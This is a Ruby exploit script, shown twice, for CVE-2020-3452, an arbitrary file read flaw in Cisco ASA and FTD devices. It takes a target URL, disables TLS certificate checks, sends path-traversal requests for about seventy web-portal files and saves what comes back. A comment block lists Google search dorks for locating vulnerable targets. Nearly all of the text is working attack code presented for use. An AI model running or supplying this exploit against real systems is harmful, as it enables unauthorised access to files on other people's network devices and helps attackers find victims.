komodoooo/cafr.rb

## cafr.rb
require 'http'
require 'openssl'

puts """
CVE-2020-3452
CISCO ASA&FTD arbitrary file read exploit
By komodo\n
"""

=begin
Google dorks to search vulnerable target:

inurl:"/+CSCOE+/"
inurl:logon.html "CSCOE"

(some of these may not be vulnerable)
=end

$cont=1
$dirname="CISCO_files"
def dir(name=$dirname)
    begin
        Dir.mkdir(name)
        Dir.chdir(name)
    rescue Errno::EEXIST
        $cont+=1
        dir("#{$dirname}-#{$cont}")
    end
end

def main(target)
    files = ["logo.gif","http_auth.html","user_dialog.html","localization_inc.lua",
            "portal_inc.lua","include","nostcaccess.html","ask.html","no_svc.html",
            "svc.html","session.js","useralert.html","ping.html","help","app_index.html",
            "tlbr","portal_forms.js","logon_forms.js","win.js","portal.css","portal.js",
            "sess_update.html","blank.html","noportal.html","portal_ce.html","portal.html",
            "home","logon_custom.css","portal_custom.css","preview.html","session_expired",
            "custom","portal_elements.html","commonspawn.js","common.js","appstart.js",
            "appstatus","relaymonjar.html","relaymonocx.html","relayjar.html",
            "relayocx.html","portal_img","color_picker.js","color_picker.html",
            "cedhelp.html","cedmain.html","cedlogon.html","cedportal.html",
            "cedsave.html","cedf.html","ced.html","lced.html","files",
            "041235123432C2","041235123432U2","pluginlib.js","shshim",
            "do_url","clear_cache","connection_failed_form","apcf",
            "ucte_forbidden_data","ucte_forbidden_url","cookie",
            "session_password.html","tunnel_linux.jnlp","tunnel_mac.jnlp",
            "sdesktop","gp-gip.html","auth.html","wrong_url.html","logon_redirect.html",
            "logout.html","logon.html","test_chargen"]
    target.delete_suffix!("/") unless target[-1..-1] != "/"
    @ctx = OpenSSL::SSL::SSLContext.new()
    @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    dir()
    File.open("!target.txt", "w"){|f|f.write(target)}
    files.each do |file|
        r = HTTP.get("#{target}/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/#{file}&default-language&lang=../",
            :ssl_context=>@ctx)
        if r.to_s.include?("File not found")
            puts "File '#{file}' not found"
        elsif r.code == 200
            output = File.open(file, "w")
            output.write(r.body)
            output.close()
            puts "Downloaded file #{file}"
        else
            puts "Not vulnerable (status code #{r.code})"
            exit()
        end
    end
    puts "\nExploit finished, all downloaded files are stored in \n#{Dir.pwd}"
end

begin
    print "\rTarget url: "
    main(gets.chomp)
rescue => e
    abort(e.to_s)
end
	require 'http'
	require 'openssl'

	puts """
	CVE-2020-3452
	CISCO ASA&FTD arbitrary file read exploit
	By komodo\n
	"""

	=begin
	Google dorks to search vulnerable target:

	inurl:"/+CSCOE+/"
	inurl:logon.html "CSCOE"

	(some of these may not be vulnerable)
	=end

	$cont=1
	$dirname="CISCO_files"
	def dir(name=$dirname)
	begin
	Dir.mkdir(name)
	Dir.chdir(name)
	rescue Errno::EEXIST
	$cont+=1
	dir("#{$dirname}-#{$cont}")
	end
	end

	def main(target)
	files = ["logo.gif","http_auth.html","user_dialog.html","localization_inc.lua",
	"portal_inc.lua","include","nostcaccess.html","ask.html","no_svc.html",
	"svc.html","session.js","useralert.html","ping.html","help","app_index.html",
	"tlbr","portal_forms.js","logon_forms.js","win.js","portal.css","portal.js",
	"sess_update.html","blank.html","noportal.html","portal_ce.html","portal.html",
	"home","logon_custom.css","portal_custom.css","preview.html","session_expired",
	"custom","portal_elements.html","commonspawn.js","common.js","appstart.js",
	"appstatus","relaymonjar.html","relaymonocx.html","relayjar.html",
	"relayocx.html","portal_img","color_picker.js","color_picker.html",
	"cedhelp.html","cedmain.html","cedlogon.html","cedportal.html",
	"cedsave.html","cedf.html","ced.html","lced.html","files",
	"041235123432C2","041235123432U2","pluginlib.js","shshim",
	"do_url","clear_cache","connection_failed_form","apcf",
	"ucte_forbidden_data","ucte_forbidden_url","cookie",
	"session_password.html","tunnel_linux.jnlp","tunnel_mac.jnlp",
	"sdesktop","gp-gip.html","auth.html","wrong_url.html","logon_redirect.html",
	"logout.html","logon.html","test_chargen"]
	target.delete_suffix!("/") unless target[-1..-1] != "/"
	@ctx = OpenSSL::SSL::SSLContext.new()
	@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
	dir()
	File.open("!target.txt", "w"){\|f\|f.write(target)}
	files.each do \|file\|
	r = HTTP.get("#{target}/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/#{file}&default-language&lang=../",
	:ssl_context=>@ctx)
	if r.to_s.include?("File not found")
	puts "File '#{file}' not found"
	elsif r.code == 200
	output = File.open(file, "w")
	output.write(r.body)
	output.close()
	puts "Downloaded file #{file}"
	else
	puts "Not vulnerable (status code #{r.code})"
	exit()
	end
	end
	puts "\nExploit finished, all downloaded files are stored in \n#{Dir.pwd}"
	end

	begin
	print "\rTarget url: "
	main(gets.chomp)
	rescue => e
	abort(e.to_s)
	end